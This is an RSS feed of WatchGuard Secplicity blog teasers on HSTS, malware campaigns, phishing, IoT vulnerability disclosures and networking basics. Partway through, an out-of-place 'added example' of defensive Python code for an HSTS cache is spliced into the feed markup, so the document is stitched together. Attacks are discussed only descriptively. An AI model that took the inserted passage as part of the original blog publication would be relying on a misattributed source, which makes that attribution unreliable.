  <description>  &lt;p&gt;Intro HTTP Strict Transport Security (HSTS) is an HTTP security mechanism that lets a web site declare itself accessible only via secure connections, and lets users direct their user agents (UAs), i.e. their browsers, to interact with that site only over a secure connection. A "secure connection" in this case means an SSL/TLS-encrypted HTTP connection, or HTTPS. The mechanism is designed to protect against downgrade attacks such as sslstrip, which downgrades HTTPS to HTTP by rewriting the redirects and links the victim sees. I will talk more about that later, but first, how did HSTS come about? Origins HSTS is defined&lt;/p&gt;


</description>
  <pubDate>Tue, 05 Nov 2019 13:35:02 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">1c42438e-968f-477e-9a59-aa27537736cf</guid>
    </item>
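The HSTS post above explains the mechanism in prose; the following is an added example, not code from the original post, of the user-agent side of it in Python. It keeps a small cache of known HSTS hosts, parses a Strict-Transport-Security header (max-age, includeSubDomains, and max-age=0 meaning "forget this host"), ignores the header when it arrived over plain HTTP (RFC 6797 section 8.1, so an on-path attacker cannot plant or clear policies), drops expired policies, and rewrites an http:// URL for a known host to https:// before any request is sent. That last step is exactly what sslstrip cannot get past: the plain-HTTP link or redirect it serves never results in a plain-HTTP request. The host names and timestamps are constructed for illustration.

```python
"""User-agent side HSTS cache and upgrade decision, modelled on RFC 6797.

Added example; not code from the original post. Host names and timestamps
used with it are constructed for illustration.
"""
import re
from dataclasses import dataclass

MAX_AGE_RE = re.compile(r"max-age\s*=\s*\"?(\d+)\"?", re.IGNORECASE)
HTTP_URL_RE = re.compile(r"http://([^/:]+)(:\d+)?(/.*)?$")


@dataclass
class HstsPolicy:
    expires_at: float        # absolute time after which the policy is forgotten
    include_subdomains: bool


def parse_hsts_header(value: str, now: float):
    """Parse a Strict-Transport-Security header value.

    Returns an HstsPolicy, or None when the header is malformed or carries
    max-age=0, which RFC 6797 defines as "forget this host".
    """
    m = MAX_AGE_RE.search(value)
    if m is None:
        return None
    max_age = int(m.group(1))
    if max_age == 0:
        return None
    directives = [d.strip().lower() for d in value.split(";")]
    return HstsPolicy(expires_at=now + max_age,
                      include_subdomains="includesubdomains" in directives)


class HstsCache:
    """Minimal browser-style store of known HSTS hosts."""

    def __init__(self):
        self._hosts = {}

    def observe(self, host: str, header_value: str, over_https: bool, now: float):
        """Record (or clear) a policy from a response header."""
        # RFC 6797 section 8.1: the header MUST be ignored on plain HTTP,
        # otherwise an on-path attacker could plant or clear policies.
        if not over_https:
            return
        host = host.lower()
        policy = parse_hsts_header(header_value, now)
        if policy is None:
            self._hosts.pop(host, None)     # max-age=0 or malformed: forget
        else:
            self._hosts[host] = policy

    def is_known(self, host: str, now: float) -> bool:
        """True if host, or a parent with includeSubDomains, has a live policy."""
        labels = host.lower().split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])
            policy = self._hosts.get(candidate)
            if policy is None:
                continue
            if now > policy.expires_at:
                continue                    # expired policy no longer applies
            if i == 0 or policy.include_subdomains:
                return True
        return False

    def rewrite(self, url: str, now: float) -> str:
        """Return the URL the UA should actually fetch.

        An http:// link or redirect to a known HSTS host is rewritten to
        https:// before any request leaves the browser, so there is no
        plaintext request for sslstrip to intercept.
        """
        m = HTTP_URL_RE.match(url)
        if m is None:
            return url
        host, port, path = m.group(1), m.group(2), m.group(3) or "/"
        if not self.is_known(host, now):
            return url
        # Port 80 becomes 443 (implicit); any other explicit port is kept (RFC 6797 8.3).
        if port in (None, ":80"):
            port = ""
        return "https://" + host + port + path


if __name__ == "__main__":
    cache = HstsCache()
    cache.observe("example.com", "max-age=31536000; includeSubDomains", True, 0.0)
    print(cache.rewrite("http://www.example.com/login", 10.0))
```

Two behaviours are worth noting when reading it: the cache is empty until the site has been visited once over HTTPS, which is the first-visit gap that browser preload lists close, and a header seen over HTTP is discarded rather than trusted, so a downgraded connection cannot be used to poison the cache.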
<item>
  <title>Android APK Reverse Engineering: Using JADX</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/android-apk-reverse-engineering-using-jadx</link>
  <description>  &lt;p&gt;In continuation of the Android APK Reverse Engineering series, this post will cover how to actually start digging into an APK’s programming logic. My last blog post detailed how to unzip an APK archive and what contents are within. While it’s useful to an extent, it’s not helpful in reading and understanding the programming logic. Remember the code itself is in binary format and cannot be read within a text editor or other development environment. In my testing, I used quite a few different tools and frameworks. There are varying installation processes with each tool, but the most common&lt;/p&gt;


</description>
  <pubDate>Fri, 04 Oct 2019 13:26:56 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">1f84a3e8-f894-41a2-9aa2-d719f3b8fc79</guid>
    </item>
<item>
  <title>MSPs Beware: Attackers Targeting MSP Infrastructure to Install Ransomware</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/msps-beware-attackers-targeting-msp-infrastructure-install</link>
  <description>  &lt;p&gt;In the past two weeks, sophisticated threat actors have targeted managed service providers (MSPs) and cloud service providers (CSPs), intending to install ransomware within their infrastructure and customer base. Often, these attacks specifically target products and services MSPs use, such as ConnectWise/Kaseya software, the Webroot Management Console, RDP services and more. Though we’ve seen MSP attack campaigns begin much earlier this year, this malicious activity recently progressed with a new batch of attacks that have affected a large number of MSPs, large and small. Whilst these attacks&lt;/p&gt;


</description>
  <pubDate>Mon, 08 Jul 2019 10:41:16 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">d9e9330d-8f68-4a27-afaa-16bb40574976</guid>
    </item>
<item>
  <title>New Phishing Attacks Stealing MFA Tokens Too</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/new-phishing-attacks-stealing-mfa-tokens-too</link>
  <description>  &lt;p&gt;In the Firebox Feed, our threat intelligence feed powered by WatchGuard Firebox customers around the world, we recently came across a trending phishing campaign that uses a malicious PDF as part of its attack. Targeting mostly German users, the PDF comes attached to an email with a subject line that translates from German to "Invoice for your sales tax." Included in the email were instructions to add a certificate to the user’s trusted certificate store. While we didn't have to add any certificates for the malware to successfully infect our sandbox, as a rule one should never add a certificate&lt;/p&gt;


</description>
  <pubDate>Thu, 06 Jun 2019 01:52:33 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">4a4c99e2-076a-44d1-9516-3062fb46c2a1</guid>
    </item>
<item>
  <title>Green Mountain Grill Security Analysis</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/green-mountain-grill-security-analysis</link>
  <description>  &lt;p&gt;Automated smokers like the Green Mountain Grill (GMG) Davy Crockett are great for smoking different meats and other foods without having to tend the grill during the entire process. GMG has pushed this idea further with a Wi-Fi controller that monitors and controls the grill. Now, one doesn’t even need to leave the couch to maintain the grill. Unfortunately though, this convenience comes with a price. The setup of the grill consists of downloading an app to your phone and connecting to the grill on its own broadcasted Wi-Fi network. Using the app, you can add the grill to your home Wi-Fi&lt;/p&gt;


</description>
  <pubDate>Fri, 31 May 2019 08:25:20 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">0c447420-93dd-4e03-82ea-4aeffe723cdf</guid>
    </item>
<item>
  <title>Source Code Analysis: Exobot</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/source-code-analysis-exobot</link>
  <description>  &lt;p&gt;WatchGuard recently released its Internet Security Report (ISR) for Q4 2018. In addition to the many interesting details of malware attacks, IPS hits, and top security incidents, there is also a Threat Research section that covers the Exobot malware campaign. You can listen to The 443 Podcast’s overview of the report if that’s your groove. This post is not a regurgitation of that, rather how the team and I went about analyzing the procured source code. To ensure you’re familiar with what Exobot is, I will repeat the overview of it, but then follow up with how I went about debugging the server&lt;/p&gt;


</description>
  <pubDate>Fri, 12 Apr 2019 14:58:53 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">c6aaeb47-a461-4a5b-88f7-77f91805d78a</guid>
    </item>
<item>
  <title>Phishing Passwords With Maersk, Microsoft and Adobe</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/phishing-passwords-maersk-microsoft-and-adobe</link>
  <description>  &lt;p&gt;We recently discovered a sharp increase in a particular phishing scam while reviewing threat intelligence from the Firebox feed, our threat data from Firebox appliances around the world. Its primary targets were in Germany and Italy, but we also found some instances of the campaign in the Asian Pacific regions. Addressed with popular shipping companies like DHL and Maersk in both the TO field and the FROM field, this spam mimicked a financial invoice or statement to ultimately try and steal credentials. Let’s take a look at one of the samples we collected that masqueraded as an email from the&lt;/p&gt;


</description>
  <pubDate>Thu, 14 Mar 2019 13:03:25 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">e45f3aee-0c4b-4cfe-8d99-4b042307ddcf</guid>
    </item>
<item>
  <title>How Data Moves Across a Network</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/how-data-moves-across-network</link>
  <description>  &lt;p&gt;Building on the Networking Basics article previously written and a high-level overview of How Servers Serve Content, I wanted to write about how data actually moves over a network. That is, what happens when a user on a network node communicates with another networked node. There are two main models that are accepted: the Open Systems Interconnection (OSI) model separates duties into seven distinct layers and the TCP/IP model does so in four distinct layers. Regardless which model you reference, the core concept is the same in that they both separate the duties of transmitting data into&lt;/p&gt;


</description>
  <pubDate>Fri, 01 Mar 2019 13:48:53 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">649feee2-5397-43ca-acc1-bdce09d2b8e6</guid>
    </item>
<item>
  <title>How Servers Serve Content</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/how-servers-serve-content</link>
  <description>  &lt;p&gt;Computers seem to be virtually limitless in their abilities – they can send and receive digital information, serve content via many defined protocols, compute algorithms much faster than a human can, and even provide countless hours of fun and entertainment. One very common use of computers is indeed serving content to consumers, a technological concept known as client / server model. A simple metaphor: a consumer (or a client) goes (makes a connection request) to a place of business (or a server) and peruses the content therein. The bottom line is that a server hosts and provides resources&lt;/p&gt;


</description>
  <pubDate>Fri, 15 Feb 2019 14:05:37 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">ffd47b36-5500-4343-ac2c-4297efeff291</guid>
    </item>
<item>
  <title>Networking Basics</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/networking-basics</link>
  <description>  &lt;p&gt;Computers are a great tool and provide many perks to their users; they can perform tasks in a rather impressively fast manner, potentially offer paperless offices, and you’re even able to play computer games…of course not during working time! Aside from these great benefits, however, how useful would they be if we typed something up, had to print it (thus negating the “paperless” aforementioned attribute) and fax / mail / hand-deliver it to the respective recipient? This is where the ever-loved “network” aspect comes in. There is history to how this concept began, was revised, and came to be&lt;/p&gt;


</description>
  <pubDate>Thu, 17 Jan 2019 13:50:43 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">0a81e7b3-31ca-4367-8171-7c28d3afa66d</guid>
    </item>
<item>
  <title>Brexit Email Tricks Users Into Downloading Malware</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/brexit-email-tricks-users-downloading-malware</link>
  <description>  &lt;p&gt;Recently, some individuals received emails that used Brexit to trick them into opening malicious office document attachments. The document’s authors must have been watching the news carefully because the file’s name was Brexit 15.11.2018.docx and the emails came around the same time as the release of the Brexit plan. Looking at the Document, we see the author of the document is “Johnn” according to the metadata. The file’s metadata also mentions Grizli777, a well-known group that pirates Microsoft office software under the mentioned author's name. Fancy Bear, a well-known Russian state&lt;/p&gt;


</description>
  <pubDate>Mon, 03 Dec 2018 16:22:05 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">a9e0de83-1990-4f37-8b76-0b7d30cfcab9</guid>
    </item>
<item>
  <title>WatchGuard’s Q1 2018 Internet Security Report</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/watchguards-q1-2018-internet-security-report</link>
  <description>  &lt;p&gt;Today, we’re pleased to announce the release of WatchGuard’s Internet Security Report for Q1 2018! Every quarter, WatchGuard’s Threat Lab looks forward to diving into Firebox Feed data from tens of thousands of live Firebox appliances across the globe to produce a report on the latest security threats cybercriminals are using against small to midsize businesses (SMBs) and distributed enterprises. In addition to analyses of the top computer and network threats from Q1, our latest report highlights useful defensive strategies companies of all sizes can use to protect themselves, an original&lt;/p&gt;


</description>
  <pubDate>Wed, 27 Jun 2018 15:38:32 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">2c0b73d7-38ae-4847-a802-c875f272b918</guid>
    </item>
<item>
  <title>WatchGuard’s Q4 2017 Internet Security Report Released; Malicious Office Document Usage on the Rise</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/watchguards-q4-2017-internet-security-report-released-malicious</link>
  <description>  &lt;p&gt;Today, WatchGuard Technologies released its quarterly Internet Security Report covering Q4 2017. Every quarter we examine anonymized data from our Firebox UTM appliances all across the world and report on the most common malware variants and network attacks that our appliances block. This gives valuable real-world information on the most common network and computer threats aimed at small and medium-sized businesses and distributed enterprises. This quarter, active Fireboxes blocked more than 30 million malware variants and 6.9 million network attacks. We found growth in macro-less Word&lt;/p&gt;


</description>
  <pubDate>Tue, 27 Mar 2018 21:05:23 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">aecbcc00-2a2c-4c7c-b7bf-9dca58d709ff</guid>
    </item>
<item>
  <title>WatchGuard’s Q3 2017 Internet Security Report</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/watchguards-q3-2017-internet-security-report</link>
  <description>  &lt;p&gt;Today, we’re pleased to announce the release of WatchGuard’s Internet Security Report for Q3 2017! Every quarter, WatchGuard’s Threat Lab looks forward to diving into Firebox Feed data from tens of thousands of live Firebox appliances across the globe to produce a report on the latest security threats cybercriminals are using against small to midsize businesses (SMBs) and distributed enterprises. In addition to analyses of the top computer and network threats from Q3, our latest report highlights useful defensive strategies companies of all sizes can use to protect themselves, an original&lt;/p&gt;


</description>
  <pubDate>Wed, 13 Dec 2017 05:59:31 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">71f68b2e-293a-4b41-ae9c-4824a038ef27</guid>
    </item>
<item>
  <title>Indicators of RDP Brute Force Attacks</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/indicators-rdp-brute-force-attacks</link>
  <description>  &lt;p&gt;I have been investigating an incident involving two EC2 instances on AWS that were infected with ransomware, cryptocurrency miners, and other types of malware. Sounds scary, right?! Well actually, the approaches that the attackers took to get onto the hosts do not appear to be that sophisticated, and this type of attack could occur in any environment, not just in the cloud. This post presents the suspected way in which the attackers got into the hosts. In later posts, I’ll provide tips to protect yourself from RDP brute force attacks. I’ll also explain what the attackers did on the instances&lt;/p&gt;


</description>
  <pubDate>Tue, 05 Dec 2017 14:46:07 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">d0568b57-bac7-4d77-b65b-d88fba2d5680</guid>
    </item>
<item>
  <title>WatchGuard’s Q2 2017 Internet Security Report</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/watchguards-q2-2017-internet-security-report</link>
  <description>  &lt;p&gt;Today, we are releasing our Internet Security Report for Q2 2017. Each quarter, we analyze data from our Firebox UTM appliances deployed around the world in order to determine the latest computer and network security threats affecting small to midsize businesses (SMBs) and distributed enterprises. Additionally, in our latest report we analyze the WannaCry Ransomworm and discuss findings from our SSH and Telnet honeypots. Some of this report’s highlights include: Nearly half of all malware is able to circumvent legacy AV solutions Attacks aimed at credential theft are growing Attackers are&lt;/p&gt;


</description>
  <pubDate>Thu, 28 Sep 2017 09:38:23 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">961f7ce3-81cc-41ff-8f1b-47bacbd813e8</guid>
    </item>
<item>
  <title>WatchGuard's Q1 2017 Internet Security Report</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/watchguards-q1-2017-internet-security-report</link>
  <description>  &lt;p&gt;Today, I am excited to announce our Internet Security Report for Q1 2017. Each quarter, we examine data from our UTM appliances around the world in order to analyze the latest computer and network security threats affecting small to midsize businesses (SMBs) and distributed enterprises. In our latest report, we evaluate the quarter’s top threats, provide an analysis of the CIA Vault 7 leak, feature new research on IoT cameras and deliver key defensive learnings for readers. Some of the report’s top trends and highlights include: Linux malware is on the rise. Legacy antivirus (AV) continues to&lt;/p&gt;


</description>
  <pubDate>Mon, 26 Jun 2017 20:30:28 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">c740aa7e-1e55-4303-9d75-91ce86aed223</guid>
    </item>
<item>
  <title>Historical Cryptography Ciphers</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/historical-cryptography-ciphers</link>
  <description>  &lt;p&gt;Like most technologies, encryption has evolved throughout the years from simple origins. While modern encryption relies on complex computational operations, older encryption ciphers were rudimentary and easy to break. Regardless of each cipher’s strength, all encryption methods share a common goal, to encode a readable “plaintext” message in a way that prevents unauthorized individuals from reading it. Let’s explore the history of encryption and some historical ciphers that were used to hide messages from prying eyes. Substitution Ciphers Caesar Cipher The Caesar cipher, also called a Caesar&lt;/p&gt;


</description>
  <pubDate>Thu, 25 May 2017 11:51:14 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">9d313e11-cbb5-4547-a8c0-57b9e21cd9b3</guid>
    </item>
<item>
  <title>Once Stolen, What Do Hackers Do With Your Data?</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/once-stolen-what-do-hackers-do-your-data</link>
  <description>  &lt;p&gt;It’s a common question: What happens to your data after a hacker steals it? Understanding the nuts and bolts of an attacker’s post-hack routine is not only interesting, but it could also help you minimize the damage if your data is stolen. (Note that the following information is a general overview of the most common steps a hacker takes to monetize stolen information. Individual cases may vary and this does not apply to nation-state actors that hack for reasons other than making money.) Once an attack has happened and the criminal has your data, he or she likely runs through the following&lt;/p&gt;


</description>
  <pubDate>Thu, 18 May 2017 15:15:08 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">51686874-3ed1-491a-8455-e16919908b87</guid>
    </item>
<item>
  <title>Responsible Disclosure: Ouvis C2 HD Security Camera</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/responsible-disclosure-ouvis-c2-hd-security-camera</link>
  <description>  &lt;p&gt;As a part of our ongoing IoT vulnerability research project, one of the recently tested devices included the Ouvis C2 HD Wireless Security Camera. This is a wireless camera which includes Android, iOS and browser-based remote viewing. Open Telnet Access Vulnerability After connecting an IoT device to my test network, my first task always involves a port scan to identify open services on the device. A port scan of the Ouvis camera showed open Telnet on TCP/23 and an HTTP web server running on TCP/81 – a non-standard port for web servers. I immediately noted the open Telnet access as a potential&lt;/p&gt;


</description>
  <pubDate>Tue, 09 May 2017 11:03:24 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">75f78f36-fec4-48ce-a6b9-3642c9898fd7</guid>
    </item>
<item>
  <title>WatchGuard's Q4 2016 Internet Security Report</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/watchguards-q4-2016-internet-security-report</link>
  <description>  &lt;p&gt;Today, I am very excited to share WatchGuard's first formal Internet Security Report. For over a decade, WatchGuard's threat team has educated the general public and our customers about the latest threats, vulnerabilities, and security stories through articles, podcasts, and videos. In this new quarterly security report, we're also excited to share some quantifiable data from WatchGuard's Firebox Feed. The Firebox Feed is the name we’ve given to the anonymized threat data gathered from the tens of thousands of Firebox appliances protecting our customers around the world. It gathers data about&lt;/p&gt;


</description>
  <pubDate>Wed, 29 Mar 2017 21:00:07 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">745081b3-92e8-4185-8df8-67a41a551246</guid>
    </item>
<item>
  <title>Responsible Disclosure: Amcrest View Web Portal</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/responsible-disclosure-amcrest-view-web-portal</link>
  <description>  &lt;p&gt;Recently I purchased a number of IoT devices for a vulnerability research project. Among them was the Amcrest IPM-721S Wireless IP camera, a wireless pan-and-tilt camera, which at the time had 6,381 reviews on Amazon.com (interestingly, that number is down to 1,425 at the time of this writing). Camera Setup Initial setup of the camera was straightforward using the Amcrest View Pro Android app. Setup included scanning a serial number QR code on the camera to join the app with the camera’s default peer-to-peer (P2P) wireless network, followed by setting a new administrator password and adding&lt;/p&gt;


</description>
  <pubDate>Wed, 18 Jan 2017 07:00:26 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">afb4d0e8-4dd9-4769-a7fe-a5be6e99007a</guid>
    </item>
<item>
  <title>What is the TCP Split-Handshake Attack and Does It Affect Me?</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/what-tcp-split-handshake-attack-and-does-it-affect-me</link>
  <description>  &lt;p&gt;If you've followed security news over the past few days, you've probably seen a lot of hoopla about a TCP split-handshake vulnerability that can affect firewalls and other networking and security devices. Many of the media's articles characterize this complicated TCP connection attack as, "a hacker exploit that lets an attacker trick a firewall and get into an internal network as a trusted IP connection" or as a "hole" in firewalls. I'm not sure that these descriptions properly characterize this vulnerability, and I suspect many administrators may not really understand how this attack works&lt;/p&gt;


</description>
  <pubDate>Fri, 15 Apr 2011 12:28:24 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">98a2f842-eafa-4823-a77c-7276f05b6c05</guid>
    </item>
<item>
  <title>Understanding IPv4 Subnetting (Part 2)</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/understanding-ipv4-subnetting-part-2</link>
  <description>  This article continues our attempt to explain the complex subject of subnetting in terms you can understand even if you're not a rocket scientist.

</description>
  <pubDate>Wed, 13 Apr 2011 10:00:00 -0700</pubDate>
    <dc:creator>Corey Nachreiner</dc:creator>
    <guid isPermaLink="false">c7d91446-81b1-408b-8c0d-873fb2124434</guid>
    </item>
<item>
  <title>Understanding IPv4 Subnetting (Part 1)</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/understanding-ipv4-subnetting-part-1</link>
  <description>  This Security Fundamentals article explains what IPv4 subnets are, what a subnet mask is, and how you might use them within your own network.

</description>
  <pubDate>Mon, 11 Apr 2011 10:00:00 -0700</pubDate>
    <dc:creator>Corey Nachreiner</dc:creator>
    <guid isPermaLink="false">48e43d0d-7604-41e7-bd8a-3d4410c2eded</guid>
    </item>
<item>
  <title>What Is a Port? (and Why Should I Block It?)</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/what-is-a-port</link>
  <description>  &lt;p&gt;A port is a made-up, or logical, endpoint for a connection, and ports allow the Internet to handle multiple applications over the same wires. Your system figures out how to treat data coming at it partially by looking at what port the data is destined for.&lt;/p&gt;


</description>
  <pubDate>Sat, 09 Apr 2011 10:00:00 -0700</pubDate>
    <dc:creator>Corey Nachreiner</dc:creator>
    <guid isPermaLink="false">bc609722-977d-4447-bcd7-e5d5129c4cb2</guid>
    </item>
<item>
  <title>Understanding IP Addresses and Binary</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/understanding-ip-addresses-and-binary</link>
  <description>  An IP is a numeric identifier that represents a computer or device on a network. Your computer's IP is like your home's mailing address.

</description>
  <pubDate>Thu, 07 Apr 2011 10:00:00 -0700</pubDate>
    <dc:creator>Corey Nachreiner</dc:creator>
    <guid isPermaLink="false">b02a0289-004e-4195-92e9-bc5c2a0377b2</guid>
    </item>
<item>
  <title>Internet Protocol for Beginners</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/internet-protocol-beginners</link>
  <description>  &lt;p&gt;Here's how IP routing works, and some suggestions for gaining deeper understanding of IP.&lt;/p&gt;


</description>
  <pubDate>Tue, 05 Apr 2011 10:00:00 -0700</pubDate>
    <dc:creator>Corey Nachreiner</dc:creator>
    <guid isPermaLink="false">0453c172-eed6-4387-b99d-2affb1b88d47</guid>
    </item>

  </channel>
</rss>
